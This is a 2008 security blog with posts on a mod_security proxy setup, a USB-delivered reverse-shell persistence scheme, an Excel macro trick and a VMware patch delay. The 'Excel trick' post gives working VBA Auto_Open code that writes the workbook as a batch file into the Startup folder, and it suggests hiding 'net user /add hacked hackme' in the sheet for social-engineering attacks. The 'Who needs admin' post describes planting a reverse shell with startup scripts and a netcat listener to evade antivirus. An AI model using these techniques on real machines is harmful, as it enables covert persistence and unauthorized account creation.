Monday, December 8, 2008

Apache mod security

I have been working on a web proxy lately to put all of our production web servers behind. My part was to find an IDS to integrate into the proxy. I found mod_security for Apache. It is pretty sweet. Like any IDS it has a bunch of rule sets (SQL injection, XSS, XST, command injection, etc.) that it looks for, and it either logs the request, stops the request, or redirects the request. It is a pretty sweet project and so far it has worked well for us. It is best to only log requests at first, or else the IDS may stop legitimate traffic based on false positives.
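As an added example (not from the original post), here is a minimal ModSecurity 2.x configuration for the Apache reverse proxy described above: it starts in logging-only mode so false positives can be found before anything is blocked, and shows the three rule outcomes (log, stop, redirect). The log path, rule ids, patterns, and the redirect URL are assumptions.

```apache
# Added example, not the post's own config. Paths, ids and patterns are assumptions.
<IfModule security2_module>
    # DetectionOnly: every rule is evaluated and logged, but nothing is blocked.
    # Run like this first, review the audit log, then switch to "On".
    SecRuleEngine DetectionOnly
    SecRequestBodyAccess On

    # Audit only the transactions that actually triggered a rule.
    SecAuditEngine RelevantOnly
    SecAuditLogRelevantStatus "^(?:5|4(?!04))"
    SecAuditLogType Serial
    SecAuditLog /var/log/apache2/modsec_audit.log

    # Applies when a rule matches but names no disruptive action of its own:
    # log it and let the request through.
    SecDefaultAction "phase:2,log,auditlog,pass"

    # Crude SQL injection check on all request arguments.
    # "deny" only takes effect once SecRuleEngine is On.
    SecRule ARGS "@rx (?i:union\s+select|or\s+1=1|sleep\s*\()" \
        "id:900001,phase:2,t:urlDecodeUni,deny,status:403,log,msg:'SQLi pattern in argument'"

    # Same idea for a basic XSS marker, but redirect instead of blocking.
    SecRule ARGS "@rx (?i:<script)" \
        "id:900002,phase:2,t:urlDecodeUni,redirect:http://proxy.example/blocked.html,log,msg:'XSS pattern in argument'"

    # Typical false-positive fix found during the logging-only phase:
    # stop checking one legitimate free-text field against one rule.
    # SecRuleRemoveTargetById 900001 ARGS:comment
</IfModule>
```

Once the audit log is clean for normal traffic, change SecRuleEngine to On and the deny/redirect actions become live.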

Who needs admin

So the other day I decided to play around and see what it would take to gain control over a machine without administrative privileges. So this is what I did. I found a reverse connect-back shell for Windows on the government security page. Symantec does not detect it. I was going to code my own, but I got lucky and found this one first. So then I wrote some batch files and Visual Basic scripts that would save themselves and the revshell into the user directory and user startup directory. These areas are all writable with non-admin privs. The VBS script in the startup directory will start up the revshell each time the user logs in. On a remote server I have netcat listening for a connection from my revshell. I then used my U3 drive and gonzor's switchblade to load the revshell and batch files onto the machine. So in the end all I have to do is plug my jumpdrive into a Windows machine and I have instant control. If the user was running under a non-administrative account I can then use exploits to elevate my privs on the machine. If the user was running an admin account then I have an instant administrative account on the machine. I chose to do it this way to keep antivirus from detecting the attack and to keep a non-administrative user from stopping the attack.

Attack Mitigation:

Run a firewall like ZoneAlarm
Disable Windows autorun
Be cautious of what media you put into your machine
Be cautious of what you run

Excel trick

This summer I discovered a fun trick using Excel macros. It is possible to use an Excel macro to save an Excel workbook as a batch file. So I wrote a quick macro to do this. This macro will autorun when the Excel workbook is opened. It will then save itself as a batch file in the startup directory and then change back to an xls file. Because the xls file will be saved line by line as a bat file, and bat files ignore all lines they don't understand, you can hide one line like "net user /add hacked hackme" in a normal spreadsheet. This could be used for a social eng. attack because most people will just run the macro and never think twice about it. The next time they log in to their account they will run whatever commands you put into your batch file.

Sub Auto_Open()
    ' Runs automatically when the workbook is opened (if macros are enabled).
    ' First save: write the sheet out as plain text, named go.bat, into the
    ' all-users Startup folder, so it runs as a batch file at the next login.
    ActiveWorkbook.SaveAs Filename:= _
        "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\go.bat", FileFormat:=xlText, _
        CreateBackup:=False

    ' Second save: save again as a normal workbook so the open document
    ' goes back to being an ordinary .xls file.
    ActiveWorkbook.SaveAs Filename:= _
        "C:\windows\temp\pw add.xls", FileFormat:=xlNormal, _
        Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, _
        CreateBackup:=False
End Sub

Wednesday, December 3, 2008

Patiently Waiting

VMware emailed me on Monday to tell me that they have found another problem related to the vmdk crash issue. As a result they have postponed the patching of that issue till Q1 of 2009. They also informed me that they will wait to patch all my other vulnerabilities until Q1 2009. So I am still just patiently waiting. I never realized how long it can take to patch stuff like this.